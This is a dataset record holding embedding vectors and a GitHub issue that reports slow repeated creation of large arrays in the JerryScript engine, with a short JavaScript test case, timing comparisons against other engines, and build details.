0.02869185246527195, -0.01734856143593788, 0.008967871777713299, -0.006999477744102478, -0.010656020604074001, -0.004870942328125238, 0.007293068803846836, 0.024594923481345177, 0.006208783481270075, 0.023607390001416206, 0.006198774557560682, -0.0010859533213078976, 0.006585780996829271, -0.019937502220273018, -0.030987201258540154, -0.003271204885095358, -0.0002151888911612332, 0.011316600255668163, -0.005261285230517387, 0.05161864310503006, 0.00906796008348465, 0.0028041282203048468, 0.025382280349731445, 0.009928715415298939, 0.000864925910718739, 0.012317478656768799, -0.009208083152770996, -0.006278845015913248, -0.019363664090633392, -0.03539106622338295, 0.0026840227656066418, 0.013298340141773224, 0.02304689772427082, 0.015600360929965973, 0.001956717576831579, -0.00499438401311636, -0.012544345110654831, 0.020417923107743263, -0.0006468177889473736, -0.004964357707649469, -0.0013528541894629598, 0.014025645330548286, 0.025235485285520554, -0.0004758343566209078, -0.011369980871677399, -0.02594277262687683, 0.00766005739569664, 0.0048876237124204636, -0.011770332232117653, 0.017762258648872375, -0.0071929809637367725, -0.015306769870221615, -0.013598604127764702, -0.002994295209646225, -0.01526673510670662, 0.02284672111272812, 0.016828104853630066, -0.009708521887660027, 0.019870776683092117, -0.037766486406326294, 0.016814760863780975, 0.011990525759756565, -0.001368701457977295, 0.006742585450410843, -0.0008624237379990518, -0.01143003348261118, 0.009928715415298939, -0.024701682850718498, 0.017468666657805443, 0.0343768447637558, -0.01626761257648468, -0.008407380431890488, -0.014759622514247894, 0.003579809097573161, -0.009188065305352211, -0.0047775269486010075, 0.049296606332063675, 0.006408959161490202, -0.02104514092206955, 0.009495001286268234, 0.009848644956946373, 0.014092370867729187, 0.021538907662034035, 0.005147852003574371, 0.0014254179550334811, 0.011216512881219387, 0.0016856463626027107, 0.008313965052366257, -0.003526428947225213, -0.014719587750732899, 0.03336261957883835, 0.026102913543581963, -0.015693776309490204, 0.0017965770093724132, -0.0027874468360096216, -0.00571501674130559, -0.00858753826469183, -0.010889559052884579, 0.032214947044849396, 0.007379811257123947, 0.03432346135377884, -0.002116858260706067, -0.006352242548018694, -0.006402286700904369, -0.003549782792106271, 0.013565241359174252, -0.008874456398189068, -0.012717830948531628, -0.0005538194673135877, -0.011923800222575665, -0.019870776683092117, 0.013718709349632263, 0.0039000902324914932, 0.032908886671066284, -0.0004900134517811239, 0.005251276306807995, -0.0029692731332033873, 0.0043905205093324184, 0.012704485096037388, -0.011470068246126175, 0.03915436938405037, 0.00013167808356229216, -0.015119939111173153, 0.006005271337926388, 0.006515719462186098, 0.003002635668963194, 0.011023009195923805, 0.013838814571499825, 0.003096051048487425, -0.00186330231372267, -0.023767530918121338, 0.0077067650854587555, -0.023500628769397736, -0.01828271523118019, 0.01733521744608879, 0.010188943706452847, -0.0018399484688416123, -0.0009858653647825122, -0.0016981572844088078, 0.009982096031308174, -0.004400529433041811, 0.00024813448544591665, -0.029412485659122467, 0.006906062364578247, -0.007306413725018501, -0.0095083462074399, -0.00215522525832057, -0.0025772624649107456, 0.005361373070627451, -0.0020684823393821716, 0.015373495407402515, 0.020524684339761734, -0.019550494849681854, -0.016948210075497627, 0.010195616632699966, 0.014239165931940079, 0.00300764013081789, -0.001597235444933176, -0.009294825606048107, -0.006092014256864786, -0.009181393310427666, 0.02866516262292862, 0.004073575604707003, -0.003443022258579731, -0.006158739328384399, 0.01526673510670662, 0.02111186645925045, -0.00031631934689357877, 0.0006426474428735673, -0.015133284032344818, -0.011670243926346302, -0.012277443893253803, -0.0037966661620885134, 0.003906762693077326, -0.008727661333978176, 0.0008444912964478135, 0.0033195805735886097, -0.016828104853630066, -0.001993416575714946, -0.008507467806339264, -0.007433191407471895, 0.020524684339761734, 0.0070461854338645935, -0.0024154535494744778, 0.012043905444443226, 0.008147151209414005, 0.011256547644734383, -0.02879861369729042, 0.004897632636129856, 0.012817918322980404, 0.018829861655831337, 0.00276909745298326, -0.011570156551897526, -0.00369657832197845, -0.015066558495163918, -0.013658656738698483, -0.005805095657706261, 0.012123975902795792, 0.013745399191975594, 0.00202010665088892, 0.009148030541837215, -0.012430911883711815, -0.011763659305870533, -0.0012694476172327995, 0.0022986845578998327, -0.008734333328902721, 0.011676916852593422, 0.01060264091938734, 0.012671123258769512, 0.0038100110832601786, 0.01106971688568592, -0.01736190728843212, -0.009241445921361446, -0.0013628629967570305, -0.00619543856009841, 0.0045973691157996655, -0.024594923481345177, 0.00475417310371995, -0.016534514725208282, -0.013692018575966358, 0.005861812271177769, -0.0066558425314724445, 0.015106594190001488, -0.007353121414780617, 0.019884120672941208, -0.011296583339571953, -0.006979459896683693, -0.011596846394240856, 0.01821598969399929, -0.007880250923335552, 0.006402286700904369, -0.0039301165379583836, 0.01242423988878727, -0.0043905205093324184, -0.02683689072728157, 0.02869185246527195, -0.007246361114084721, -0.009661814197897911, -0.010969629511237144, -0.0030159808229655027, -0.004453909583389759, 0.006145394407212734, -0.024394746869802475, -0.011470068246126175, 0.004764182027429342, 0.023433903232216835, -0.0017073320923373103, 0.0077067650854587555, 0.010442500002682209, -0.02121862582862377, -0.004213698673993349, 0.004897632636129856, 0.00273907114751637, 0.016654619947075844, -0.008941181935369968, 0.004707465413957834, 0.014292546547949314, 0.0005830117734149098, -0.027277277782559395, 0.01634768396615982, -0.029092203825712204, 0.013104837387800217, 0.014506067149341106, -0.004143637139350176, -0.007019495125859976, -0.017909053713083267, -0.008147151209414005, -0.0062721725553274155, 0.0064156316220760345, -0.00025334738893434405, -0.019937502220273018, -0.0015722134849056602, 0.03370958939194679, 0.007606677245348692, 0.004704129416495562, -0.006832664366811514, 0.012724502943456173, -0.003643197938799858, 0.016694655641913414, -0.024715028703212738, 0.0032545235008001328, -0.004050222225487232, -0.00022561471269000322, 0.005498159676790237, -0.00458068773150444, 0.010342411696910858, -0.013011422008275986, -0.0030626885127276182, 0.003035998437553644, 0.0071929809637367725, -0.012711158022284508, 0.008267257362604141, 0.003579809097573161, 0.011710279621183872, -0.009848644956946373, 0.006005271337926388, -0.0006142892525531352, 0.019723979756236076, 0.00008731622801860794, -0.009835300035774708, -0.0070795477367937565, 0.007953648455440998, 0.011089734733104706, 0.03256191685795784, -0.0014863046817481518, -0.002794119296595454, -0.0249018594622612, 0.016774725168943405, 0.0020584736485034227, 0.00028358225245028734, -0.013732054270803928, 0.0018449528142809868, 0.021285351365804672, 0.023247072473168373, 0.0013219937682151794, 0.013865504413843155, 0.021365420892834663, -0.003940125461667776, -0.03242846578359604, -0.026997031643986702, -0.0025772624649107456, -0.010309049859642982, 0.001874979236163199, 0.00124859600327909, 0.006532400846481323, -0.008527485653758049, -0.014572791755199432, -0.010382447391748428, 0.011790350079536438, 0.01620088890194893, 0.011810366995632648, 0.015720466151833534, 0.02871854230761528, 0.004150310065597296, 0.014345926232635975, -0.012430911883711815, -0.007860233075916767, 0.002583934925496578, 0.00963512435555458, 0.0247684083878994, -0.02019105665385723, -0.009621779434382915, 0.03461705520749092, -0.008460760116577148, 0.005688326433300972, 0.008954526856541634, 0.016494479030370712, -0.010575950145721436, 0.002912556752562523, 0.001848289160989225, 0.00040785802411846817, 0.016507824882864952, -0.00954838190227747, -0.001397893764078617, -0.00008481403347104788, 0.0048909601755440235, -0.016734689474105835, -0.011196495033800602, 0.0057016718201339245, 0.031013891100883484, 0.013124854303896427, 0.010922921821475029, 0.016000712290406227, 0.007840215228497982, 0.02390098012983799, 0.019697289913892746, -0.019643910229206085, 0.016627930104732513, 0.011503431014716625, 0.031013891100883484, 0.01904338225722313, -0.008240566588938236, 0.006822655908763409, -0.008781041018664837, 0.02568921633064747, 0.010749435983598232, -0.005324673838913441, -0.020858310163021088, 0.013118182308971882, 0.016934866085648537, 0.005338019225746393, -0.007980338297784328, 0.0101155461743474, -0.0019333638483658433, -0.0059385462664067745, -0.024701682850718498, -0.0035698001738637686, 0.011750314384698868, 0.03707254305481911, -0.003943461459130049, -0.003281213575974107, -0.024194572120904922, 0.018602997064590454, -0.006008607801049948, -0.02296682633459568, 0.019470425322651863, 0.0016331002116203308, -0.0019233550410717726, -0.010862869210541248, -0.002110185567289591, 0.0018299396615475416, -0.008694298565387726, -0.006549082230776548, 0.009615106508135796, 0.02482178807258606, 0.022579820826649666, 0.007813525386154652, -0.017695533111691475, -0.001276954310014844, -0.024434782564640045, -0.017748912796378136, -0.01805584877729416, -0.0011993861990049481, 0.022459715604782104, -0.032108183950185776, -0.01917683333158493, -0.0039034264627844095, -0.012304133735597134, -0.017468666657805443, -0.00407023960724473, 0.006245482247322798, -0.014159095473587513, -0.012831263244152069, -0.01916348934173584, -0.003656543092802167, -0.004217035137116909, 0.022539785131812096, -0.01487972866743803, -0.04769520089030266, -0.0008816072368063033, 0.010769453831017017, 0.007960321381688118, 0.004764182027429342, -0.0007765149930492043, -0.012704485096037388, -0.014479377306997776, -0.03130748122930527, -0.02021774649620056, -0.014132405631244183, 0.01713504083454609, -0.01733521744608879, 0.012751192785799503, -0.011063044890761375, -0.015907296910881996, -0.0124509297311306, 0.0030259895138442516, -0.01146339625120163, 0.020391233265399933, 0.025408970192074776, -0.01913679763674736, -0.010429155081510544, -0.006722567602992058, 0.03069360926747322, -0.0019383681938052177, 0.022299574688076973, -0.015747155994176865, 0.0013987277634441853, 0.01804250478744507, 0.02390098012983799, 0.023393869400024414, -0.004110274836421013, -0.002275330713018775, 0.012998076155781746, 0.0038600550033152103, -0.008027045987546444, -0.026276398450136185, 0.0017665507039055228, 0.005201232153922319, 0.015039868652820587, 0.0023620733991265297, 0.0012877971166744828, 0.014759622514247894, 0.016534514725208282, 0.019483769312500954, -0.0027207215316593647, 0.013058129698038101, -0.009928715415298939, -0.005184551235288382, 0.023527318611741066, 0.004146973602473736, -0.02973276562988758, 0.020871654152870178, 0.034910645335912704, -0.0031210731249302626, -0.00913468562066555, -0.010869541205465794, 0.01435927115380764, -0.007506589405238628, 0.0031344180461019278, 0.018496235832571983, 0.0016280958661809564, 0.009288153611123562, -0.025208795443177223, 0.013865504413843155, 0.024528197944164276, 0.0049276589415967464, 0.022539785131812096, 0.015707122161984444, 0.01203056052327156, 0.014265855774283409, -0.007479899097234011, 0.02091168984770775, 0.004483935888856649, -0.014732932671904564, 0.01812257431447506, -0.00913468562066555, 0.004640740342438221, 0.026329779997467995, -0.0012402554275467992, 0.03435015305876732, 0.021338731050491333, 0.002475506393238902, 0.022793341428041458, 0.0006718397489748895, 0.010255669243633747, 0.009428276680409908, 0.011002992279827595, 0.010902903974056244, -0.03154769167304039, -0.003699914552271366, -0.014319236390292645, -0.0003740783722605556, 0.04091591760516167, 0.00148797279689461, 0.03862056881189346, -0.014732932671904564, -0.0027974555268883705, -0.0022936800960451365, -0.0035931540187448263, -0.003314576344564557, -0.0017865683184936643, 0.01194381806999445, 0.0017999133560806513, 0.0032628641929477453, 0.002218614099547267, -0.0007168792653828859, -0.023767530918121338, 0.0010292368242517114, 0.009434948675334454, -0.0008816072368063033, -0.015840571373701096, -0.018816517665982246, -0.0020034252665936947, 0.017548738047480583, 0.018949968740344048, -0.011603519320487976, -0.010722746141254902, -0.013658656738698483, -0.018843207508325577, 0.027597559615969658, 0.024181226268410683, 0.003377965185791254, 0.03144093230366707, -0.003643197938799858, 0.0007210496114566922, -0.0049810390919446945, 0.007820198312401772, -0.002515541622415185, 0.005231258925050497, 0.014732932671904564, 0.010435827076435089, -0.0010292368242517114, -0.03280212730169296, 0.006355579011142254, -0.0010042148642241955, -0.008327309973537922, -0.010155580937862396, 0.011797022074460983, 0.033923111855983734, 0.001210229005664587, 0.006919407285749912, -0.010696055367588997, 0.022272884845733643, 0.0003058935108128935, -0.0228734128177166, 0.023260418325662613, 0.0064523303881287575, 0.00912133976817131, -0.009021252393722534, -0.008127134293317795, -0.007066202815622091, -0.01343846321105957, -0.019924156367778778, -0.012063923291862011, 0.004136964678764343, 0.007553297095000744, -0.017895709723234177, 0.012651105411350727, 0.009194738231599331, 0.01529342494904995, 0.008320637047290802, 0.0054581244476139545, 0.00226031756028533, -0.00475417310371995, 0.0058818296529352665, 0.0006230469443835318, 0.013598604127764702, -0.019670600071549416, 0.007413174025714397, 0.014946453273296356, 0.005444779526442289, -0.017975779250264168, 0.01632099412381649, 0.003980160690844059, 0.024287987500429153, 0.013244959525763988, -0.01049587968736887, 0.006322216242551804, -0.013485170900821686, 0.0029575962107628584, 0.010636002756655216, -0.0025322227738797665, -0.011376652866601944, 0.01012221910059452, -0.006075332872569561, 0.007333103567361832, 0.020751548931002617, 0.021645667031407356, -0.006051979027688503, -0.0013520201900973916, 0.015493600629270077, 0.02284672111272812, 0.0037466222420334816, 0.009675160050392151, -0.007780163083225489, 0.010095528326928616, 0.00766005739569664, 0.011817039921879768, 0.01241756696254015, 0.007773490156978369, -0.009721867740154266, 0.0129246786236763, -0.004257070366293192, 0.010235651396214962, 0.003182793967425823, -0.03819352760910988, -0.005274630151689053, 0.00007506589463446289, -0.004694120492786169, 0.008053736761212349, 0.02104514092206955, -0.008440742269158363, -0.006906062364578247, -0.006812646985054016, 0.021512217819690704, -0.0002327042748220265, 0.01006216648966074, 0.01625426858663559, 0.013004749082028866, -0.0024187900125980377, -0.0019083418883383274, -0.001555532100610435, -0.0041169472970068455, -0.014012300409376621, 0.004810889717191458, 0.006448994390666485, -0.008374017663300037, 0.02685023657977581, -0.011416688561439514, 0.0017482012044638395, 0.026249708607792854, 0.0032345058862119913, 0.020925035700201988, 0.03440353274345398, -0.02869185246527195, 0.00007110408478183672, 0.003896754002198577, 0.015226699411869049, -0.006218792404979467, -0.010242324322462082, -0.013865504413843155, -0.03664550185203552, 0.001330334460362792, 0.016641274094581604, 0.024261297658085823, -0.01725514605641365, -0.012724502943456173, -0.0005012733745388687, 0.012304133735597134, 0.004847588483244181, 0.01053591538220644, 0.011236529797315598, -0.013565241359174252, 0.007946975529193878, -0.0015663750236853957, 0.014119060710072517, 0.024381402879953384, -0.003326253267005086, -0.003151099430397153, 0.011883765459060669, -0.014292546547949314, -0.01435927115380764, 0.016561204567551613, -0.019563840702176094, -0.001991748344153166, -0.009268135763704777, 0.009408258832991123, 0.015079904347658157, 0.00026627539773471653, -0.015960676595568657, 0.008567520417273045, 0.004213698673993349, 0.009434948675334454, 0.006152066867798567, 0.011723624542355537, -0.005761724431067705, 0.019537150859832764, 0.0035964904818683863, -0.005251276306807995, 0.005304656457155943, -0.000572585966438055, -0.00909464992582798, -0.00816716905683279, 0.023273764178156853, -0.009254790842533112, 0.013798779807984829, -0.007873577997088432, -0.014666207134723663, 0.0040802485309541225, 0.002648991998285055, 0.023247072473168373, 0.019777361303567886, 0.010842851363122463, 0.0015538639854639769, 0.016481133177876472, 0.0018015814712271094 ]
186
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
#### Description When I repeatedly create a longer Array object with a length less than or equal to 131071, the execution time of the Jerryscript engine is much longer than the execution time of other engines. #### Version [edd2f20](https://github.com/jerryscript-project/jerryscript/commit/edd2f203974acc9ddfbad9998c29bdc40ccc0719) #### Testcase ```javascript var NISLFuzzingFunc = function(){ for(var INDEX = 0; INDEX < 10000; INDEX++){ var a = new Array(131071); } }; NISLFuzzingFunc(); ``` #### Execution time ``` JerryScript: 2686ms XS(Similar to jerryscript): 49 ms duktape: 34ms quickJS: 17ms MuJS: 19ms hermes: 23ms ``` #### Buid ``` python2 tools/build.py --clean --logging=on --line-info=on --error-messages=on --cpointer-32bit=on --mem-heap=1572864 --profile=es2015-subset ``` #### cpu ``` Intel(R) Core(TM) i9-9940X CPU @ 3.30GHz ```
A possible performance problems of repeated array creation
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4628/comments
1
2021-03-13T03:19:32
2021-12-15T09:35:28Z
https://github.com/jerryscript-project/jerryscript/issues/4628
830,790,888
4,628
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : A possible performance problems of repeated array creation Issue date: --- start body --- #### Description When I repeatedly create a longer Array object with a length less than or equal to 131071, the execution time of the Jerryscript engine is much longer than the execution time of other engines. #### Version [edd2f20](https://github.com/jerryscript-project/jerryscript/commit/edd2f203974acc9ddfbad9998c29bdc40ccc0719) #### Testcase ```javascript var NISLFuzzingFunc = function(){ for(var INDEX = 0; INDEX < 10000; INDEX++){ var a = new Array(131071); } }; NISLFuzzingFunc(); ``` #### Execution time ``` JerryScript: 2686ms XS(Similar to jerryscript): 49 ms duktape: 34ms quickJS: 17ms MuJS: 19ms hermes: 23ms ``` #### Buid ``` python2 tools/build.py --clean --logging=on --line-info=on --error-messages=on --cpointer-32bit=on --mem-heap=1572864 --profile=es2015-subset ``` #### cpu ``` Intel(R) Core(TM) i9-9940X CPU @ 3.30GHz ``` --- end body ---
1,087
[ -0.015826189890503883, -0.011713212355971336, -0.015032591298222542, -0.009202693589031696, 0.003265964100137353, 0.009591861627995968, 0.017596526071429253, 0.04434996098279953, -0.04288485646247864, 0.0046662078239023685, 0.0055132219567894936, 0.00607408257201314, 0.020450429990887642, -0.0022625194396823645, 0.03305644169449806, 0.04312903806567192, -0.02414371632039547, -0.02534937486052513, -0.02304488606750965, 0.002903503132984042, -0.00963001511991024, 0.007504849694669247, -0.03427736088633537, 0.01846643164753914, -0.030843520537018776, 0.0007201526896096766, 0.01153770461678505, -0.0057841138914227486, -0.025654606521129608, -0.005238514859229326, 0.029195277020335197, 0.02467786893248558, -0.04355636239051819, -0.0022377194836735725, 0.02371639385819435, 0.01884797029197216, 0.044441528618335724, 0.021121935918927193, -0.03644449636340141, -0.032598596066236496, 0.004181655123829842, -0.008874570950865746, -0.04300694912672043, 0.03406370058655739, 0.04422786831855774, 0.056070804595947266, 0.025532513856887817, 0.0005050607142038643, -0.0030465798918157816, 0.016879234462976456, 0.020862489938735962, -0.008019926026463509, -0.007218696177005768, -0.05872630700469017, 0.009660538285970688, -0.008439617231488228, 0.010278630070388317, 0.01262127235531807, 0.022587040439248085, 0.03577299043536186, 0.04193864017724991, -0.036017175763845444, -0.003016056725755334, 0.010950136929750443, 0.025410421192646027, 0.04419734701514244, -0.057841140776872635, 0.02889004722237587, 0.04898945987224579, 0.03906947746872902, -0.013277517631649971, -0.024754175916314125, 0.03482677415013313, 0.056620217859745026, 0.0016501512145623565, -0.04831795394420624, 0.040351442992687225, 0.012384719215333462, -0.013132533058524132, 0.018145941197872162, 0.004929468967020512, 0.03146924450993538, -0.025685127824544907, -0.0030771028250455856, 0.019916275516152382, -0.01710815727710724, -0.023914793506264687, -0.047280170023441315, 0.002046950627118349, -0.04856213927268982, -0.022297073155641556, 0.02684500440955162, -0.03409422188997269, 0.016238251700997353, -0.007867311127483845, 0.02357904054224491, -0.0447467602789402, 0.022877009585499763, -0.03500991314649582, 0.0037810401991009712, 0.02063356712460518, 0.006646389607340097, -0.0058604213409125805, -0.01709289662539959, -0.014322930946946144, 0.015978805720806122, 0.028157494962215424, -0.020114675164222717, 0.009744476526975632, 0.10286260396242142, 0.02479996159672737, -0.03623083606362343, -0.056070804595947266, -0.02751651033759117, 0.004463993012905121, 0.0169708039611578, 0.006119867321103811, -0.04648657143115997, 0.0015509513905271888, 0.04422786831855774, -0.01417794730514288, 0.03214075043797493, -0.025822483003139496, -0.03461311385035515, -0.04434996098279953, 0.02660081908106804, 0.005299560725688934, -0.0132317328825593, 0.027592817321419716, -0.020038368180394173, -0.040351442992687225, -0.013865086250007153, 0.012003181502223015, -0.026539772748947144, 0.023029625415802002, -0.015192837454378605, 0.002331196330487728, 0.06464777141809464, -0.013399609364569187, -0.015528591349720955, -0.03867267817258835, -0.05597923323512077, 0.029744692146778107, -0.017398126423358917, 0.005169838201254606, -0.021076152101159096, -0.03458259254693985, 0.04755488038063049, -0.04410577565431595, 0.0033060256391763687, 0.013056225143373013, -0.012957025319337845, -0.0018428278854116797, 0.036413975059986115, -0.0037982093635946512, -0.02321276254951954, -0.012957025319337845, 0.02046569064259529, -0.000908537011127919, 0.0005498914397321641, -0.03549828380346298, -0.028035402297973633, -0.03879477083683014, -0.01817646436393261, -0.056345511227846146, -0.006787558551877737, -0.013735363259911537, 0.03568141907453537, -0.009736846201121807, 0.002058396814391017, -0.002668857341632247, 0.015147052705287933, 0.003967993892729282, 0.051187120378017426, -0.013269886374473572, 0.00808097142726183, 0.004918023012578487, -0.003311748616397381, 0.02469312958419323, -0.047463309019804, 0.007600234355777502, -0.02319750189781189, -0.009271370247006416, 0.04773801565170288, 0.00874484796077013, -0.0030866411980241537, 0.026417681947350502, -0.008927986025810242, 0.014002439565956593, -0.0031495951116085052, 0.010400721803307533, -0.0007630757172591984, -0.004505962133407593, -0.01430766936391592, 0.009446877054870129, 0.016879234462976456, -0.029927829280495644, -0.05411732941865921, -0.019153200089931488, 0.011858196929097176, 0.03128610551357269, -0.003906947560608387, -0.016711357980966568, -0.030339891090989113, -0.01574988290667534, -0.0223733801394701, -0.005658206529915333, -0.014277147129178047, -0.001432674704119563, -0.005311007145792246, 0.011919242329895496, 0.016467174515128136, 0.017566002905368805, -0.05686440318822861, 0.010286260396242142, 0.006814266089349985, 0.019336339086294174, 0.019824707880616188, -0.02780647948384285, -0.022220764309167862, -0.009797892533242702, -0.004696730989962816, 0.004948546178638935, -0.018145941197872162, -0.022022364661097527, -0.024464206770062447, 0.000035918212233809754, 0.045784544199705124, -0.009858937934041023, -0.014956284314393997, 0.005730698816478252, -0.012903610244393349, -0.014750253409147263, 0.02292279526591301, 0.023136455565690994, -0.031957611441612244, 0.014002439565956593, -0.0031438719015568495, 0.027348633855581284, 0.02399110049009323, -0.005761221516877413, 0.0237469170242548, -0.036139264702796936, -0.031804997473955154, 0.02632611244916916, -0.011423243209719658, -0.008042817935347557, -0.021869750693440437, 0.0002639765152707696, 0.017337080091238022, 0.0021633196156471968, -0.019595785066485405, -0.003569286782294512, -0.035620372742414474, -0.008729586377739906, 0.0054788836278021336, 0.011095120571553707, 0.03671920299530029, -0.01927529275417328, -0.035223573446273804, -0.005890944506973028, 0.01370484009385109, -0.04465519264340401, 0.0339110866189003, -0.004692915827035904, 0.011423243209719658, -0.03366690129041672, 0.009156908839941025, -0.0142389927059412, -0.02264808677136898, 0.012438134290277958, -0.050942935049533844, 0.020099414512515068, 0.005669652484357357, -0.011369828134775162, 0.017138680443167686, -0.011995550245046616, 0.016863973811268806, -0.011667427606880665, 0.00420454703271389, 0.04309851676225662, 0.04242701083421707, 0.033575329929590225, 0.022953318431973457, -0.009149277582764626, -0.0006662604864686728, 0.02657029591500759, -0.03903895244002342, 0.0054445452988147736, -0.024922052398324013, -0.030568813905119896, -0.02426580712199211, 0.005192730110138655, 0.025959836319088936, 0.037390708923339844, -0.03446049988269806, 0.00005916817463003099, -0.011980288662016392, 0.013750624842941761, 0.009118754416704178, -0.04819586127996445, -0.027989616617560387, -0.0013401517644524574, -0.026219282299280167, -0.03864215314388275, -0.007306450046598911, 0.003554025199264288, -0.006802820134907961, 0.018909016624093056, -0.002113719703629613, 0.021366119384765625, -0.02534937486052513, 0.021656088531017303, -0.03360585495829582, -0.018237508833408356, -0.012163426727056503, 0.05005776882171631, -0.016741881147027016, -0.02550199069082737, -0.020129937678575516, -0.028233801946043968, -0.02005363069474697, -0.047005463391542435, 0.04096190631389618, 0.024998361244797707, 0.016436651349067688, -0.03650554269552231, 0.000598537502810359, -0.017794925719499588, -0.006882943212985992, -0.004120608791708946, -0.020282553508877754, -0.05353739112615585, 0.02982099913060665, -0.034368932247161865, -0.04963044449687004, -0.05842107534408569, 0.025120452046394348, 0.011789520271122456, 0.00427703931927681, -0.0012562134070321918, -0.021045628935098648, -0.02577669732272625, 0.0031610410660505295, 0.004906577058136463, -0.005013407673686743, -0.03012622892856598, 0.009462138637900352, 0.03400265425443649, 0.002008796902373433, 0.0010053522419184446, 0.0027260880451649427, 0.031240319833159447, 0.005318637937307358, 0.023487471044063568, -0.01683345064520836, -0.025868266820907593, 0.0076231262646615505, 0.02223602682352066, 0.015215730294585228, -0.024494729936122894, 0.01133167464286089, 0.026753434911370277, 0.015704099088907242, 0.013651425018906593, -0.010118383914232254, 0.004532669670879841, -0.012697580270469189, -0.03360585495829582, -0.00820306409150362, 0.00772995688021183, 0.03204917907714844, -0.007913094945251942, -0.017993325367569923, -0.01669609732925892, -0.02563934400677681, 0.01613142155110836, -0.0030503952875733376, -0.0015414129011332989, 0.02266334928572178, -0.02251073345541954, 0.030950350686907768, 0.03449102118611336, -0.03299539536237717, 0.025791959837079048, 0.030828259885311127, -0.028539031744003296, 0.03516253083944321, 0.015147052705287933, 0.010553337633609772, -0.022129196673631668, 0.007852049544453621, -0.03806221857666969, -0.032903824001550674, -0.03717704862356186, 0.07990928739309311, 0.009805522859096527, -0.0447162389755249, 0.013926131650805473, -0.03806221857666969, -0.026677127927541733, -0.027638603001832962, 0.009546076878905296, -0.021533997729420662, 0.004322824068367481, 0.03189656510949135, -0.0028176570776849985, -0.012567857280373573, 0.028523771092295647, 0.0005665837088599801, 0.028249062597751617, 0.0064022052101790905, -0.02483048476278782, 0.009515554644167423, 0.03119453601539135, 0.01588723622262478, 0.02699761837720871, -0.02263282611966133, -0.012293149717152119, -0.008424355648458004, -0.035070959478616714, -0.010026815347373486, 0.016848711296916008, 0.0071805426850914955, -0.04581506550312042, -0.0352846197783947, 0.0027680571656674147, 0.010751737281680107, 0.021198242902755737, -0.009981030598282814, -0.03549828380346298, -0.001474643824622035, 0.012537334114313126, 0.007844418287277222, -0.005566637497395277, -0.010667798109352589, -0.02766912616789341, -0.012300780974328518, -0.05216385796666145, -0.03647501766681671, 0.007897833362221718, 0.0217171348631382, -0.006734143011271954, -0.029485246166586876, 0.011095120571553707, -0.01484945323318243, -0.057566434144973755, 0.02278544008731842, -0.02534937486052513, -0.012377087958157063, 0.006882943212985992, 0.004288485739380121, -0.018649570643901825, 0.004273224156349897, 0.04218282550573349, -0.016192466020584106, -0.012018442153930664, -0.006905835121870041, -0.02235811948776245, 0.019778922200202942, 0.00787494145333767, 0.017169203609228134, -0.0030961798038333654, 0.007478142157196999, 0.005124053452163935, 0.025013621896505356, 0.02008415386080742, -0.05814636871218681, 0.004811192397028208, -0.029393676668405533, -0.0025467651430517435, -0.007581157144159079, -0.02618875913321972, 0.02426580712199211, -0.028722170740365982, -0.03023306094110012, 0.018145941197872162, -0.03607821837067604, 0.00403285538777709, -0.02467786893248558, -0.03159133344888687, -0.021488212049007416, -0.03922209143638611, 0.04105347394943237, -0.021808704361319542, -0.020160460844635963, 0.019901014864444733, 0.006447989959269762, 0.006669281981885433, 0.02455577626824379, -0.013239364139735699, 0.009981030598282814, -0.05396471545100212, -0.000301653373753652, -0.010812782682478428, -0.007161465473473072, -0.03232388570904732, -0.021472951397299767, 0.003235441166907549, 0.0014383976813405752, -0.0016186743741855025, -0.05732224881649017, 0.0380011722445488, 0.006325897760689259, 0.00036341481609269977, 0.003554025199264288, -0.013208840973675251, 0.041022948920726776, 0.00233882712200284, -0.040229350328445435, 0.010202322155237198, -0.03516253083944321, 0.023930054157972336, -0.008119125850498676, -0.015978805720806122, -0.035742465406656265, -0.04166393354535103, 0.013216471299529076, 0.03815378621220589, 0.016848711296916008, -0.0071194963529706, -0.003273594891652465, -0.02103036642074585, 0.006779927760362625, 0.01003444567322731, 0.0022663348354399204, 0.013765886425971985, 0.02347220852971077, 0.006146574858576059, -0.013949024491012096, -0.04999672248959541, 0.02020624466240406, -0.004147316329181194, 0.020374121144413948, -0.01710815727710724, -0.016467174515128136, 0.013124902732670307, 0.0237469170242548, -0.010744106024503708, 0.023624824360013008, 0.03882529214024544, 0.04038196802139282, -0.013277517631649971, 0.034368932247161865, 0.004692915827035904, 0.008569340221583843, -0.022327596321702003, -0.0006734143244102597, 0.04230491816997528, 0.011056967079639435, -0.023670608177781105, -0.017382865771651268, 0.026692388579249382, -0.005623868200927973, -0.023762177675962448, -0.007161465473473072, 0.03555933013558388, -0.008531186729669571, -0.008660909719765186, -0.0057154372334480286, -0.003651317209005356, 0.002613534452393651, 0.020587783306837082, -0.009652907960116863, -0.010980659164488316, -0.02290753275156021, -0.0039260247722268105, 0.04581506550312042, -0.06501404941082001, 0.012651795521378517, 0.009401093237102032, -0.01681818813085556, -0.017535479739308357, -0.02740968018770218, -0.0017235972918570042, -0.013567485846579075, -0.0029015953186899424, -0.012254996225237846, 0.002073658164590597, -0.006524297408759594, 0.032476503401994705, -0.018130678683519363, -0.019458431750535965, 0.0065700821578502655, -0.022037627175450325, -0.046883370727300644, -0.007005034945905209, 0.002069843001663685, 0.004288485739380121, -0.01585671305656433, -0.018909016624093056, 0.001200890401378274, -0.016772404313087463, 0.015902498736977577, -0.005539929494261742, 0.007169096264988184, -0.017947541549801826, 0.012857825495302677, 0.03552880510687828, -0.013765886425971985, 0.005364422220736742, 0.02357904054224491, 0.008317525498569012, -0.03214075043797493, -0.010797521099448204, 0.027180757373571396, -0.022602302953600883, 0.021930797025561333, -0.005589529871940613, 0.015223360620439053, -0.010362568311393261, 0.006928727496415377, 0.02916475385427475, -0.006863866001367569, -0.009813154116272926, 0.011766627430915833, 0.036963388323783875, 0.015452283434569836, -0.025303591042757034, 0.0012342749396339059, 0.02414371632039547, -0.03537619113922119, -0.009431615471839905, -0.018008587881922722, -0.022877009585499763, 0.037634894251823425, -0.015307298861443996, -0.022174980491399765, -0.005135499406605959, -0.010309153236448765, 0.0007335065165534616, -0.018084894865751266, 0.0000680806624586694, 0.001792274066247046, -0.011293520219624043, 0.016787664964795113, 0.017001327127218246, 0.006631128024309874, -0.007859679870307446, -0.012316042557358742, -0.032598596066236496, 0.013262256048619747, -0.02713497169315815, -0.0006395528325811028, -0.0034681791439652443, 0.011552966199815273, -0.05628446489572525, -0.011636904440820217, 0.006596789695322514, 0.017596526071429253, 0.02185448817908764, 0.015368345193564892, -0.0002680303587112576, 